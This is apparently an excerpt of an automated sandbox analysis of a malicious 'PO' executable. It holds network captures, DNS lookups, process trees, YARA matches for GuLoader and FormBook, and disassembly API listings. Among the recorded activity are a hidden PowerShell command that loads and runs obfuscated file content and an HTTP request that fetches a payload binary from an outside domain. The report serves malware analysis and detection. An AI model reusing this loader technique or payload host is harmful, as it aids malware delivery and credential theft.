Jul 26, 2024 23:55:53.076066017 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.076297998 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.109394073 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.109633923 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.109692097 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.391743898 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.391763926 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.392018080 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.392066002 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.392340899 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.392663002 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.392806053 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.392975092 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.393140078 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.393312931 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.393443108 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.393471003 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.393487930 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.393640041 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.393640041 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.393733978 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.426131964 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.426386118 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.708338022 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.708384037 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.708576918 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.708673000 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.710458994 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.710680962 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.710680962 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.711194992 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.711354017 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.711455107 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.712379932 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.712774992 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.712774992 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.713056087 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.713226080 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.713355064 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.713480949 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.713635921 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.713776112 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.713804960 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.713999033 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.714088917 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.714190960 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.714415073 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.714499950 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.714637995 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.714768887 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.714900970 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.715040922 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.715223074 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.715248108 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.715282917 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.715415955 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.715642929 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.742772102 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.742947102 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.742947102 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.743133068 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.743339062 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.743386984 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:53.743544102 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:53.743686914 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.025758028 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:54.025795937 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:54.025923014 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.025923014 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.025979996 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.026025057 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:54.026030064 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.026082993 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:54.026175022 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.026175022 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.026220083 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.026268005 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.026745081 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:54.026894093 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.026895046 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.026948929 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.027092934 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.027431965 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:54.027576923 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.027576923 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.027626038 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.027806044 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.028141975 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:54.028450966 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
Jul 26, 2024 23:55:54.028711081 CEST | 443 | 49778 | 185.90.59.130 | 192.168.11.20
Jul 26, 2024 23:55:54.028868914 CEST | 49778 | 443 | 192.168.11.20 | 185.90.59.130
              Jul 26, 2024 23:55:54.029073954 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.031729937 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.031883955 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.032139063 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.032300949 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.032475948 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.032603025 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.032871962 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.033070087 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.033129930 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.033373117 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.033513069 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.033513069 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.033565998 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.033610106 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.033808947 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.033952951 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.033952951 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.033999920 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.034020901 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.034118891 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.034200907 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.104484081 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.104484081 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.104517937 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.104674101 CEST49778443192.168.11.20185.90.59.130
               Timestamp | Source Port | Dest Port | Source IP | Dest IP
               Jul 26, 2024 23:55:50.945802927 CEST | 59293 | 53 | 192.168.11.20 | 1.1.1.1
               Jul 26, 2024 23:55:51.422103882 CEST | 53 | 59293 | 1.1.1.1 | 192.168.11.20
               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
               Jul 26, 2024 23:55:50.945802927 CEST | 192.168.11.20 | 1.1.1.1 | 0xe567 | Standard query (0) | villa-ventura.com | A (IP address) | IN (0x0001) | false
               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
               Jul 26, 2024 23:55:51.422103882 CEST | 1.1.1.1 | 192.168.11.20 | 0xe567 | No error (0) | villa-ventura.com | | 185.90.59.130 | A (IP address) | IN (0x0001) | false
              • villa-ventura.com
               Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
               0 | 192.168.11.20 | 49778 | 185.90.59.130 | 443 | 5076 | C:\Users\user\AppData\Local\Temp\Sammentrykket.exe
               Timestamp | Bytes transferred | Direction | Data
               2024-07-26 21:55:52 UTC | 182 | OUT | GET /FPkXcnPDrjTal168.bin HTTP/1.1
               User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
               Host: villa-ventura.com
               Cache-Control: no-cache
               2024-07-26 21:55:52 UTC | 249 | IN | HTTP/1.1 200 OK
               Date: Fri, 26 Jul 2024 21:55:52 GMT
               Server: Apache
               Upgrade: h2,h2c
               Connection: Upgrade, close
               Last-Modified: Mon, 22 Jul 2024 07:18:39 GMT
               Accept-Ranges: bytes
               Content-Length: 286784
               Content-Type: application/octet-stream



              Target ID:0
              Start time:17:55:13
              Start date:26/07/2024
              Path:C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe"
              Imagebase:0x400000
              File size:876'348 bytes
              MD5 hash:D332BCAA3C61494B774F49BF3E716C21
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              Target ID:2
              Start time:17:55:13
              Start date:26/07/2024
              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Wow64 process (32bit):true
              Commandline:"powershell.exe" -windowstyle hidden "$Typograferer=Get-Content 'C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Heptandrous.Arr';$Anskueliggjordes=$Typograferer.SubString(51945,3);.$Anskueliggjordes($Typograferer)"
              Imagebase:0xa90000
              File size:433'152 bytes
              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.76792434686.000000000AF9D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              Reputation:high
              Has exited:true

              Target ID:3
              Start time:17:55:13
              Start date:26/07/2024
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff7cade0000
              File size:875'008 bytes
              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true

              Target ID:4
              Start time:17:55:42
              Start date:26/07/2024
              Path:C:\Users\user\AppData\Local\Temp\Sammentrykket.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\Temp\Sammentrykket.exe"
              Imagebase:0x400000
              File size:876'348 bytes
              MD5 hash:D332BCAA3C61494B774F49BF3E716C21
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.77600228920.0000000022040000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000002.77583228848.000000000360D000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              Antivirus matches:
              • Detection: 29%, ReversingLabs
              Reputation:low
              Has exited:true

              Target ID:5
              Start time:17:56:39
              Start date:26/07/2024
              Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
              Wow64 process (32bit):false
              Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
              Imagebase:0x140000000
              File size:16'696'840 bytes
              MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.81461887155.00000000050C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
              Reputation:moderate
              Has exited:false

              Target ID:8
              Start time:17:56:40
              Start date:26/07/2024
              Path:C:\Windows\SysWOW64\WerFault.exe
              Wow64 process (32bit):true
              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 1896
              Imagebase:0x6e0000
              File size:482'640 bytes
              MD5 hash:40A149513D721F096DDF50C04DA2F01F
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high
              Has exited:true


                Execution Graph

                Execution Coverage:40.5%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:21.3%
                Total number of Nodes:492
                Total number of Limit Nodes:12
1800->1798 1800->1800 1802 405ef1 18 API calls 1801->1802 1803 405c46 1802->1803 1804 405c65 1803->1804 1805 405c4e DeleteFileW 1803->1805 1806 405d85 1804->1806 1838 40651a lstrcpynW 1804->1838 1834 403a3b OleUninitialize 1805->1834 1813 406850 2 API calls 1806->1813 1806->1834 1808 405c8b 1809 405c91 lstrcatW 1808->1809 1810 405c9e 1808->1810 1811 405ca4 1809->1811 1812 405e35 2 API calls 1810->1812 1814 405cb4 lstrcatW 1811->1814 1816 405cbf lstrlenW FindFirstFileW 1811->1816 1812->1811 1815 405daa 1813->1815 1814->1816 1817 405de9 3 API calls 1815->1817 1815->1834 1816->1806 1830 405ce1 1816->1830 1818 405db4 1817->1818 1819 405bde 5 API calls 1818->1819 1822 405dc0 1819->1822 1821 405d68 FindNextFileW 1823 405d7e FindClose 1821->1823 1821->1830 1824 405dda 1822->1824 1825 405dc4 1822->1825 1823->1806 1827 40557c 24 API calls 1824->1827 1828 40557c 24 API calls 1825->1828 1825->1834 1827->1834 1831 405dd1 1828->1831 1829 405c26 60 API calls 1836 405d32 1829->1836 1830->1821 1830->1829 1830->1836 1839 40651a lstrcpynW 1830->1839 1840 405bde 1830->1840 1833 4062da 36 API calls 1831->1833 1832 40557c 24 API calls 1832->1821 1833->1834 1834->1463 1834->1464 1835 40557c 24 API calls 1835->1836 1836->1821 1836->1832 1836->1835 1837 4062da 36 API calls 1836->1837 1837->1836 1838->1808 1839->1830 1848 405fe5 GetFileAttributesW 1840->1848 1843 405c0b 1843->1830 1844 405c01 DeleteFileW 1846 405c07 1844->1846 1845 405bf9 RemoveDirectoryW 1845->1846 1846->1843 1847 405c17 SetFileAttributesW 1846->1847 1847->1843 1849 405bea 1848->1849 1850 405ff7 SetFileAttributesW 1848->1850 1849->1843 1849->1844 1849->1845 1850->1849

                Callgraph

                (Rendered as an interactive graph in the original report: executed nodes are drawn solid, non-executed nodes faded, node opacity indicates relevance, and nodes with disassembly are linked. The raw edge list is not reproduced; the 68 function nodes, by graph index, are:)
                • 0 Function_004034C2, 1 Function_004044C2, 2 Function_00406A42, 3 Function_00405FC5, 4 Function_00405AC8, 5 Function_00403BC9, 6 Function_00405A4B, 7 Function_0040564F, 8 Function_0040444F, 9 Function_00406850
                • 10 Function_004069D4, 11 Function_00406557, 12 Function_00403F58, 13 Function_004034D9, 14 Function_004062DA, 15 Function_004044DD, 16 Function_00405BDE, 17 Function_00406BDF, 18 Function_00405E60, 19 Function_00406160
                • 20 Function_00406461, 21 Function_00405FE5, 22 Function_00405AE5, 23 Function_004068E7, 24 Function_004063E8, 25 Function_00405DE9, 26 Function_0040136D, 27 Function_00405F6F, 28 Function_00403AEF, 29 Function_00405EF1
                • 30 Function_00404476, 31 Function_00406877, 32 Function_00403F77, 33 Function_0040647A, 34 Function_00405B7A, 35 Function_0040557C, 36 Function_0040307D, 37 Function_00405AFD, 38 Function_00406306, 39 Function_00406387
                • 40 Function_00401389, 41 Function_0040350A, 42 Function_0040600A, 43 Function_0040140B, 44 Function_0040608D, 45 Function_00402F93, 46 Function_00405E94, 47 Function_00405E16, 48 Function_00406A97, 49 Function_00407517
                • 50 Function_00404498, 51 Function_00407598, 52 Function_00403019, 53 Function_00403B19, 54 Function_0040651A, 55 Function_00403E9F, 56 Function_004067A1, 57 Function_00406923, 58 Function_00405C26, 59 Function_004044AB
                • 60 Function_004034AC, 61 Function_004074B2, 62 Function_004032B4, 63 Function_00403B34, 64 Function_00401434, 65 Function_00405E35, 66 Function_00406039, 67 Function_004060BC
                (Function_0040350A, index 41, has the most outgoing edges in the graph and is the entry point whose control-flow graph follows.)

                Control-flow Graph

                (Function at 40350a, basic blocks 0 to 142 covering 40350a-403ae9. The basic-block edge list was rendered as an interactive graph in the original report, with executed and non-executed blocks distinguished, and is not reproduced here; the Windows APIs called from these blocks are listed under APIs below.)
                APIs
                • SetErrorMode.KERNELBASE(00008001), ref: 0040352D
                • GetVersionExW.KERNEL32(?), ref: 00403556
                • GetVersionExW.KERNEL32(0000011C), ref: 0040356D
                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403604
                • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403640
                • OleInitialize.OLE32(00000000), ref: 00403647
                • SHGetFileInfoW.SHELL32(0079FF08,00000000,?,000002B4,00000000), ref: 00403665
                • GetCommandLineW.KERNEL32(007A7A60,NSIS Error), ref: 0040367A
                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe",00000020,"C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe",00000000), ref: 004036B3
                • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 004037E6
                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004037F7
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403803
                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403817
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040381F
                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403830
                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403838
                • DeleteFileW.KERNELBASE(1033), ref: 0040384C
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403933
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403942
                  • Part of subcall function 00405AC8: CreateDirectoryW.KERNELBASE(?,00000000,004034FD,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00405ACE
                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040394D
                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe",00000000,?), ref: 00403959
                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403979
                • DeleteFileW.KERNEL32(0079F708,0079F708,?,007A9000,?), ref: 004039D8
                • CopyFileW.KERNEL32(C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe,0079F708,00000001), ref: 004039EB
                • CloseHandle.KERNEL32(00000000,0079F708,0079F708,?,0079F708,00000000), ref: 00403A18
                • OleUninitialize.OLE32(?), ref: 00403A3B
                • ExitProcess.KERNEL32 ref: 00403A55
                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403A69
                • OpenProcessToken.ADVAPI32(00000000), ref: 00403A70
                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403A84
                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403AA3
                • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AC8
                • ExitProcess.KERNEL32 ref: 00403AE9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AA000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007AC000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.00000000007C2000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.00000000007C8000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76394616110.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO Tournefortian2453525525235235623425523235.jbxd
                Similarity
                • API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                • String ID: "C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized$C:\Users\user\AppData\Local\efterplaprernes\Shakya\memorized\Laminas$C:\Users\user\Desktop$C:\Users\user\Desktop\PO Tournefortian2453525525235235623425523235.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                • API String ID: 3859024572-2013704663
                • Opcode ID: d994e2c909d6b36eaefda8903238c4ace49fc37aa9f54e33e17b160914ad5137
                • Instruction ID: 53a60b58fdbd25313d51bce5ca3a2b86b24fade18f433b590921527e5da6acff
                • Opcode Fuzzy Hash: d994e2c909d6b36eaefda8903238c4ace49fc37aa9f54e33e17b160914ad5137
                • Instruction Fuzzy Hash: B2E1F8B0A00214ABD720AFB59D45ABF3AB8EB45705F10807EF581B62D1DB7C8B41CB6D

                Control-flow Graph

                (Function at 405c26, basic blocks 391 to 449 covering 405c26-405de6. The basic-block edge list was rendered as an interactive graph in the original report, with executed and non-executed blocks distinguished, and is not reproduced here; the Windows APIs called from these blocks are listed under APIs below.)
                APIs
                • DeleteFileW.KERNELBASE(?,?,76A13420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C4F
                • lstrcatW.KERNEL32(007A3F50,\*.*), ref: 00405C97
                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CBA
                • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F50,?,?,76A13420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CC0
                • FindFirstFileW.KERNEL32(007A3F50,?,?,?,0040A014,?,007A3F50,?,?,76A13420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CD0
                • FindNextFileW.KERNEL32(00000000,?,000000F2,?,?,?,?,?), ref: 00405D70
                • FindClose.KERNEL32(00000000), ref: 00405D7F
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.76393379189.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.76393328316.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393436615.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.76393471413.0000000000786000.00000004.00000001.01000000.00000003.sdmp
